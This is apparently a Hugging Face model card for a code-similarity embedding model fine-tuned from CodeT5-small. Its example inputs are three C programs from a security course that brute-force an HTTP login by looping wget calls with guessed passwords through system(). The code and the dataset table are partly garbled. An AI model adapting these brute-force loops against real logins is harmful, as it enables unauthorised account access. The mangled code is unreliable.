Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks
Paper
•
1908.10084
•
Published
•
9
This is a sentence-transformers model finetuned from Salesforce/codet5-small. It maps sentences & paragraphs to a 512-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False, 'architecture': 'T5EncoderModel'})
(1): Pooling({'word_embedding_dimension': 512, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-C-CodeT5Small-ST")
# Run inference
sentences = [
'\n\n#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n#define MAX_SIZE 255\n\n\n\nint genchkpwd(char *chararray,char *passwd)\n {\n int i,j,k,success;\n char str1[MAX_SIZE],str2[MAX_SIZE],tempstr[MAX_SIZE];\n \n \n strcpy(str1,"wget --http-user= --http-passwd=");\n strcpy(str2," http://sec-crack.cs.rmit.edu./SEC/2/");\n strcpy(tempstr,"");\n\n\n\n for(i=0;i<52;i++)\n {\n passwd[0]= chararray[i];\n strcat(tempstr,str1);\n strcat(tempstr,passwd);\n strcat(tempstr,str2);\n printf("SENDING REQUEST AS %s\\n",tempstr);\n success=system (tempstr);\n if (success==0)\n return 1;\n else\n strcpy(tempstr,""); \n strcpy(passwd,"");\n } \n\n\n\n for(i=0;i<52;i++)\n {\n passwd[0]= chararray[i];\n for(j=0;j<52;j++)\n {\n passwd[1]=chararray[j];\n\t strcat(tempstr,str1);\n strcat(tempstr,passwd);\n strcat(tempstr,str2);\n printf("SENDING REQUEST AS %s\\n",tempstr);\n success=system (tempstr);\n if (success==0)\n return 1;\n else\n strcpy(tempstr,""); \n \n } \n }\n\n\n\n for(i=0;i<52;i++)\n {\n passwd[0]= chararray[i];\n for(j=0;j<52;j++)\n {\n passwd[1]=chararray[j];\n for(k=0;k<52;k++)\n\t {\n\t passwd[2]=chararray[k];\n\t strcat(tempstr,str1);\n strcat(tempstr,passwd);\n strcat(tempstr,str2);\n printf("SENDING REQUEST AS %s\\n",tempstr);\n success=system (tempstr);\n if (success==0)\n return 1;\n else\n strcpy(tempstr,""); \n\t } \n } \n }\n return 1;\n } \n\nint (int argc, char *argv[])\n {\n char chararray[52],passwd[3];\n int i,success;\n char ch=\'a\';\n\n\n \n int , end; \n = time();\t \n\n for (i=0;i<3;i++)\n {\n passwd[i]=\'\\0\';\n } \n\n\n\n for (i=0;i<26;i++)\n {\n chararray[i]= ch;\n\t ch++;\n }\n ch=\'A\'; \n for (i=26;i<52;i++)\n {\n chararray[i]= ch;\n\t ch++;\n }\n\n\n\n success=genchkpwd(chararray,passwd);\n printf("\\nPassword is %s\\n",passwd); \n getpid();\n end = time(); \n printf("Time required = %lld msec\\n",(end-)/());\n return (EXIT_SUCCESS);\n }\n \n\t \n\t \t\n',
'\n\n#include<stdio.h>\n#include<stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n#include <sys/time.h>\n#include<string.h>\nint ()\n{\nchar a[100],c[100],c1[100],c2[100],m[50];\nchar b[53]="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";\n\nint i,j,k,count=0;\nint total_time,start_time,end_time;\nstart_time = time();\n\n\nfor(i=0;i<52;i++)\n{\n\t\n\tm[0]=b[i];\n\tm[1]=\'\\0\';\n\tstrcpy(c,m);\n\tprintf("%s \\n",c);\n\tfor(j=0;j<52;j++)\n\t{\n\tm[0]=b[j];\n\tm[1]=\'\\0\';\n\tstrcpy(c1,c);\n\tstrcat(c1,m);\n\tprintf("%s \\n",c1);\n\tfor(k=0;k<52;k++)\n\t{\n\t\tcount++;\n\t\tprintf("ATTEMPT :%d\\n",count);\n\t\t\n\t\tm[0]=b[k];\n\t\tm[1]=\'\\0\';\n\t\tstrcpy(c2,c1);\n\t\tstrcat(c2,m);\n\nstrcpy(a,"wget http://sec-crack.cs.rmit.edu./SEC/2/index.php --http-user= --http-passwd=");\n\n\t\tstrcat(a,c2);\t\t\n\t\tif(system(a)==0)\n\t\t{\n\t\tprintf("Congratulations!!!!BruteForce Attack Successful\\n");\n\t\tprintf("***********************************************\\n");\n\t\tprintf("The Password is %s\\n",c2);\n\t\tprintf("The Request sent is %s\\n",a); \n end_time = time();\n total_time = (end_time -start_time);\n total_time /= 1000000000.0;\n printf("The Time Taken is : %llds\\n",total_time);\n\t\texit(1);\n\t\t}\n\t\t\n\t\t\n\t\t\n\t\t\n\t}\n\n}\n}\nreturn 0;\n}\n',
'#include<stdio.h>\n#include<stdlib.h>\n#include<string.h>\n#include<ctype.h>\n#include<time.h>\n\nint ()\n{\n\n int m,n,o,i;\n char URL[255];\n char v[3];\n char temp1[100];\nchar temp2[100];\nchar temp3[250];\nchar [53]={\'a\',\'A\',\'b\',\'B\',\'c\',\'C\',\'d\',\'D\',\'e\',\'E\',\'f\',\'F\',\'g\',\'G\',\'h\',\'H\',\'i\',\'I\',\'j\',\'J\',\'k\',\'K\',\'l\',\'L\',\'m\',\'M\',\'n\',\'N\',\'o\',\'O\',\'p\',\'P\',\'q\',\'Q\',\'r\',\'R\',\'s\',\'S\',\'t\',\'T\',\'u\',\'U\',\'v\',\'V\',\'w\',\'W\',\'x\',\'X\',\'y\',\'Y\',\'z\',\'Z\'};\ntime_t u1,u2;\n\n (void) time(&u1); \n strcpy(temp1,"wget --http-user= --http-passwd=");\n strcpy(temp2," http://sec-crack.cs.rmit.edu./SEC/2/index.php");\n \n for(m=0;m<=51;m++)\n {\n v[0]=[m]; \n v[1]=\'\\0\';\n v[2]=\'\\0\';\n strcpy(URL,v); \n printf("\\nTesting with password %s\\n",URL);\n strcat(temp3,temp1);\n strcat(temp3,URL);\n strcat(temp3,temp2);\n printf("\\nSending the %s\\n",temp3);\n i=system(temp3); \n \t\n\tif(i==0)\n \t{\n\t (void) time(&u2); \n\t printf("\\n The password is %s\\n",URL);\n\t printf("\\n\\nThe time_var taken crack the password is %d second\\n\\n",(int)(u2-u1));\n \t exit(0);\n \t} \n\telse\n\t{\n\tstrcpy(temp3,"");\n\t}\n for(n=0;n<=51;n++)\n {\n v[0]=[m]; \n v[1]=[n];\n v[2]=\'\\0\';\n strcpy(URL,v); \n printf("\\nTesting with password %s\\n",URL);\n strcat(temp3,temp1);\n strcat(temp3,URL);\n strcat(temp3,temp2);\n printf("\\nSending the %s\\n",temp3);\n i=system(temp3);\n \t\n\tif(i==0)\n \t{\n\t (void) time(&u2); \n\t printf("\\n The password is %s\\n",URL);\n\t printf("\\n\\nThe time_var taken crack the password is %d second\\n\\n",(int)(u2-u1));\n \t exit(0);\n \t} \n\telse\n\t{\n\tstrcpy(temp3,"");\n\t}\n for(o=0;o<=51;o++)\n { \n v[0]=[m]; \n v[1]=[n];\n v[2]=[o];\n strcpy(URL,v); \n printf("\\nTesting with password %s\\n",URL);\n strcat(temp3,temp1);\n strcat(temp3,URL);\n strcat(temp3,temp2);\n printf("\\nSending the %s\\n",temp3);\n i=system(temp3);\n \t\n\tif(i==0)\n \t{\n\t (void) time(&u2); \n\t printf("\\n The password is %s\\n",URL);\n\t printf("\\n\\nThe time_var taken crack the password is %d second\\n\\n",(int)(u2-u1));\n \t exit(0);\n \t} \n\telse\n\t{\n\tstrcpy(temp3,"");\n\t}\n \n \n }\n }\n } \n \n} \n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 512]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities)
# tensor([[1.0000, 0.9479, 0.9183],
# [0.9479, 1.0000, 0.9429],
# [0.9183, 0.9429, 1.0000]])
sentence_0, sentence_1, and label| sentence_0 | sentence_1 | label | |
|---|---|---|---|
| type | string | string | int |
| details |
|
|
|
| sentence_0 | sentence_1 | label |
|---|---|---|
|
#include |
0 |
|
#include |
0 |
#include |
mail @cs.rmit.edu. "); system(" diff ./www.cs.rmit.edu./text1.txt ./text2.txt |
mail @cs.rmit.edu. "); system("mv ./www.cs.rmit.edu./students/index.html ./"); system("mv ./www.cs.rmit.edu./text1.txt ./text2.txt"); } sleep(86400); strcpy(chk,"y"); } } |
BatchAllTripletLossper_device_train_batch_size: 16per_device_eval_batch_size: 16num_train_epochs: 1fp16: Truemulti_dataset_batch_sampler: round_robinoverwrite_output_dir: Falsedo_predict: Falseeval_strategy: noprediction_loss_only: Trueper_device_train_batch_size: 16per_device_eval_batch_size: 16per_gpu_train_batch_size: Noneper_gpu_eval_batch_size: Nonegradient_accumulation_steps: 1eval_accumulation_steps: Nonetorch_empty_cache_steps: Nonelearning_rate: 5e-05weight_decay: 0.0adam_beta1: 0.9adam_beta2: 0.999adam_epsilon: 1e-08max_grad_norm: 1num_train_epochs: 1max_steps: -1lr_scheduler_type: linearlr_scheduler_kwargs: {}warmup_ratio: 0.0warmup_steps: 0log_level: passivelog_level_replica: warninglog_on_each_node: Truelogging_nan_inf_filter: Truesave_safetensors: Truesave_on_each_node: Falsesave_only_model: Falserestore_callback_states_from_checkpoint: Falseno_cuda: Falseuse_cpu: Falseuse_mps_device: Falseseed: 42data_seed: Nonejit_mode_eval: Falseuse_ipex: Falsebf16: Falsefp16: Truefp16_opt_level: O1half_precision_backend: autobf16_full_eval: Falsefp16_full_eval: Falsetf32: Nonelocal_rank: 0ddp_backend: Nonetpu_num_cores: Nonetpu_metrics_debug: Falsedebug: []dataloader_drop_last: Falsedataloader_num_workers: 0dataloader_prefetch_factor: Nonepast_index: -1disable_tqdm: Falseremove_unused_columns: Truelabel_names: Noneload_best_model_at_end: Falseignore_data_skip: Falsefsdp: []fsdp_min_num_params: 0fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}fsdp_transformer_layer_cls_to_wrap: Noneaccelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}deepspeed: Nonelabel_smoothing_factor: 0.0optim: adamw_torchoptim_args: Noneadafactor: Falsegroup_by_length: Falselength_column_name: lengthddp_find_unused_parameters: Noneddp_bucket_cap_mb: Noneddp_broadcast_buffers: Falsedataloader_pin_memory: Truedataloader_persistent_workers: Falseskip_memory_metrics: Trueuse_legacy_prediction_loop: Falsepush_to_hub: Falseresume_from_checkpoint: Nonehub_model_id: Nonehub_strategy: every_savehub_private_repo: Nonehub_always_push: Falsegradient_checkpointing: Falsegradient_checkpointing_kwargs: Noneinclude_inputs_for_metrics: Falseinclude_for_metrics: []eval_do_concat_batches: Truefp16_backend: autopush_to_hub_model_id: Nonepush_to_hub_organization: Nonemp_parameters: auto_find_batch_size: Falsefull_determinism: Falsetorchdynamo: Noneray_scope: lastddp_timeout: 1800torch_compile: Falsetorch_compile_backend: Nonetorch_compile_mode: Noneinclude_tokens_per_second: Falseinclude_num_input_tokens_seen: Falseneftune_noise_alpha: Noneoptim_target_modules: Nonebatch_eval_metrics: Falseeval_on_start: Falseuse_liger_kernel: Falseeval_use_gather_object: Falseaverage_tokens_across_devices: Falseprompts: Nonebatch_sampler: batch_samplermulti_dataset_batch_sampler: round_robinrouter_mapping: {}learning_rate_mapping: {}@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
@misc{hermans2017defense,
title={In Defense of the Triplet Loss for Person Re-Identification},
author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
year={2017},
eprint={1703.07737},
archivePrefix={arXiv},
primaryClass={cs.CV}
}
Base model
Salesforce/codet5-small